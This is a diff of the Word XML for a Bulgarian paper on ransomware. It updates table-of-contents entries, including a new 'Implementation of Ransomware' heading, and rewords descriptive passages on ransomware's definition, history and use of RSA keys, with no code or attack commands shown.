               <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> атаките</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1447,7 +1447,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545529 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896486 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1487,15 +1487,93 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545530" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896487" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t xml:space="preserve">Имплементация на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896487 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="bg-BG"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223896488" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t xml:space="preserve">Демонстрация на </w:t>
             </w:r>
             <w:r>
@@ -1525,7 +1603,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545530 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896488 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1545,7 +1623,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1565,10 +1643,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545531" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896489" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1595,7 +1673,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545531 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896489 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1615,7 +1693,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1635,10 +1713,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545532" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896490" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1665,7 +1743,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545532 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896490 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1685,7 +1763,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1705,10 +1783,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545533" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896491" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1735,7 +1813,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545533 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896491 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1755,7 +1833,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1775,10 +1853,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545534" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896492" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1813,7 +1891,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545534 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896492 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1833,7 +1911,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1853,10 +1931,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545535" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896493" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1891,7 +1969,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545535 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896493 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1911,7 +1989,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1932,10 +2010,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545536" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896494" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1947,41 +2025,41 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Подготовка за </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve"> инциденти</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Подготовка за </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Ransomware</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve"> инциденти</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1992,7 +2070,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545536 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896494 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2012,7 +2090,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2033,10 +2111,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545537" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896495" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2049,7 +2127,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:eastAsia="bg-BG"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2079,7 +2157,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545537 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896495 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2099,7 +2177,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
+              <w:t>21</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2120,10 +2198,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545538" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896496" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2135,7 +2213,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:eastAsia="bg-BG"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2165,7 +2243,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545538 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896496 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2185,7 +2263,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2206,10 +2284,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545539" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896497" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2222,34 +2300,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">Phishing </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>атаки</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Phishing </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>атаки</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2260,7 +2338,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545539 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896497 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2280,7 +2358,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2301,10 +2379,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545540" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896498" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2317,34 +2395,34 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
+                <w:lang w:eastAsia="bg-BG"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">Други форми на </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>Social Engineering</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">Други форми на </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>Social Engineering</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2355,7 +2433,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545540 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896498 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2375,7 +2453,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2395,10 +2473,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545541" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896499" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2440,7 +2518,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545541 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896499 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2460,7 +2538,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2480,10 +2558,10 @@
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223545542" w:history="1">
+          <w:hyperlink w:anchor="_Toc223896500" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2510,7 +2588,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223545542 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223896500 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2530,7 +2608,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>27</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2573,7 +2651,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223545520"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223896477"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -2592,20 +2670,14 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
         <w:t>Рансъмуерът</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t> е вид зловреден софтуер, който криптира файлове</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и ограничава достъпа до дадена система. Хакерът изисква откуп от</w:t>
+        <w:t xml:space="preserve"> е вид зловреден софтуер, който представлява финалната фаза на една по-сложна кибератака – той криптира файлове и ограничава достъпа до дадена система, след като нападателят вече е проникнал в нея</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Хакерът изисква откуп от</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> потърпевшия</w:t>
@@ -2644,7 +2716,13 @@
         <w:t xml:space="preserve">ги </w:t>
       </w:r>
       <w:r>
-        <w:t>изтрие.</w:t>
+        <w:t>изтрие</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> или да поиска повторно откуп</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -2749,10 +2827,7 @@
         <w:t xml:space="preserve"> да изпълни </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>наредбите</w:t>
+        <w:t>указанията</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -2828,13 +2903,15 @@
         <w:t xml:space="preserve">след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Последиците се усещат както по време на първоначалното прекъсване, така и дълго след това.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Щетите от </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> атака рядко приключват с възстановяването на системите – последиците могат да се усещат дълго след това.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3022,7 +3099,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223545521"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223896478"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -3045,72 +3122,13 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Въпреки че </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> е </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>популярен</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> последните 10 години, идеята за </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>кражба</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> на потребителска информация</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ограничаване на достъпа </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">и изискване на откуп </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>е доста стара.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> може да изглежда като съвременна заплаха, но идеята за кражба на данни, ограничаване на достъпа и искане на откуп съществува от десетилетия.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3420,70 +3438,26 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Той използва 2048-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
+        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RSA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>key pairs</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, генерирани от командно-контролен сървър и изпращани към </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>пострадалия</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>За целта са прилагани 2048-bit RSA двойк</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ключове – генерирани от командно-контролен сървър и изпращани към пострадалия.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
           <w:rPr>
-            <w:highlight w:val="yellow"/>
             <w:lang w:val="en-US"/>
           </w:rPr>
           <w:id w:val="1977027603"/>
@@ -3492,20 +3466,15 @@
         <w:sdtContent>
           <w:r>
             <w:rPr>
-              <w:highlight w:val="yellow"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
-            <w:rPr>
-              <w:highlight w:val="yellow"/>
-            </w:rPr>
             <w:instrText xml:space="preserve"> CITATION Kur22 \l 1026 </w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:highlight w:val="yellow"/>
               <w:lang w:val="en-US"/>
